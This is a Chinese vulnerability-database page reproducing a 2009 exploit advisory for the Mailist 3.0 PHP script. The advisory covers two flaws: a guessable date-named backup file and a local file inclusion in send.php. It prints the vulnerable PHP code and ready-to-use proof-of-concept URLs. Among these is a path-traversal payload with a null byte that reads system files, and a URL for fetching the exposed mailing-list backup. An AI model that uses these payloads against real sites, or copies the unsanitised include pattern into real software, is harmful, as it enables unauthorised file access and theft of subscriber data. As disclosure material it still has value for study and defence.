Mailist 3.0 Insecure Backup/Local File Inclusion Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052177 漏洞类型
发布时间 2009-02-17 更新时间 2009-02-17
CVE编号 CVE-2009-0570
CVE-2009-0571
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009020178
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#############################################################################################
[+] Mailist 3.0 Insecure Backup/Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] www.hellzone.info
[+] www.anti-intruders.org
#############################################################################################

[+] Homepage : http://ninjadesigns.co.uk/

[+] Download : http://ninjadesigns.co.uk/enter/mailist.zip


[+] Insecure Backup

 - Vulnerable code in admin.php


---------------------------------------------------------------------


if (isset($_GET['backup'])){
	echo "<br>";
	$file = 'maillist.php';
	$newfile = 'backups/'.date("jnY").'.txt';
	copy($file, $newfile);
	echo 'Successfully backed up. (backups/'.$newfile.')<br>';
	echo '<a href="'.$_SERVER['PHP_SELF'].'">Hide</a><br>';
}


----------------------------------------------------------------------

 We can see how its crated a backup : $newfile = 'backups/'.date("jnY").'.txt';
 The date() function is used.

    n -	Numeric representation of a month, without leading zeros
    j -	Day of the month without leading zeros
    Y -	A full numeric representation of a year, 4 digits

 So we can guess the database backup if we know when was created.

   Example : 622009.txt

        6 - the day without leading 0
        2 - the month without leading 0
        2009 - the year

   PoC :  http://127.0.0.1/path/backups/622009.txt



[+] Local File Inclusion


 - Vulnerable code in send.php :

---------------------------------------------------------------------

if(isset($load)){

include("outbox/".$load.".txt");
}


---------------------------------------------------------------------

 Example :

   http://127.0.0.1/path/send.php?load=[Local File]%00

 PoC :

    http://127.0.0.1/path/send.php?load=../../../../boot.ini%00



#############################################################################################